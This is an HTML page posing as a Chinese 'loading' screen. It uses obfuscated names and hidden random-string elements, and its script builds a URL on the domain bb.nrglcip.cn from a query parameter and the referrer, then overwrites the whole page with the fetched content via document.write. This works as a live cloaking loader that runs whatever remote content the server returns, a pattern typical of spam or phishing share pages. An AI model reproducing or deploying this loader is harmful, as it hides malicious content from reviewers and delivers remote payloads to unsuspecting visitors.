<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UfxoibK {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UfxoibK .kDF0Dpq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UfxoibK .content {
            line-height: 50px;
            text-align: center
        }

        .UfxoibK .img {
            width: 100%
        }

        .UfxoibK .URJ2lahJu {
            text-align: center
        }

        .UfxoibK .URJ2lahJu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UfxoibK .URJ2lahJu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UfxoibK .URJ2lahJu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UfxoibK .URJ2lahJu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UfxoibK .URJ2lahJu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UfxoibK .URJ2lahJu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UfxoibK .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function jnVZLnuVF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var t6HZDop = jnVZLnuVF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ t6HZDop +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ t6HZDop +".html?a=share";
		}
		
        Y4A3QipA=url+"#"+new Date().getTime();
        Y4A3QipA && function() {
            $.get(Y4A3QipA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>piQFBKXsiEpImH4okREe74uaN6OAzHwffo7URksDaaOiS7D6M7J5UG6dYEY3kNpqbtsY0qZ7ClR9QfZUYOBJO2m7uNjMR</div>
<b style='display:none' >uzjEqELpG2raQrY6HHHZ3PaE8dnUIivEKAbpIy2kWnnRhmaN5vLrwW66hZrAS2aPr1gNAQXn7</b>
<div style='display:none'>piQFBKXsiEpImH4okREe74uaN6OAzHwffo7URksDaaOiS7D6M7J5UG6dYEY3kNpqbtsY0qZ7ClR9QfZUYOBJO2m7uNjMR</div><div class="UfxoibK">
    <div class="kDF0Dpq">
        <div class="URJ2lahJu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>qO0vziWuNFabIfheorwFfflSoBPRNOblTEfJvfL</a>
<b style='display:none' >yT0XyeR6rjBK7SRLPrm</b>
<a  href='#' style='display:none'>qO0vziWuNFabIfheorwFfflSoBPRNOblTEfJvfL</a>
<p  style='display:none'>UkYuDqdCTrnmHZblPvmZZKKT9PCCHwppwlJAGRtihhIi7NDjDLwI5rojLoKXWMgT</p>
<p  style='display:none'>UkYuDqdCTrnmHZblPvmZZKKT9PCCHwppwlJAGRtihhIi7NDjDLwI5rojLoKXWMgT</p>
<span style='display:none'>oHC5nleA9MowgU</span>
<span style='display:none'>oHC5nleA9MowgU</span></body>
</html>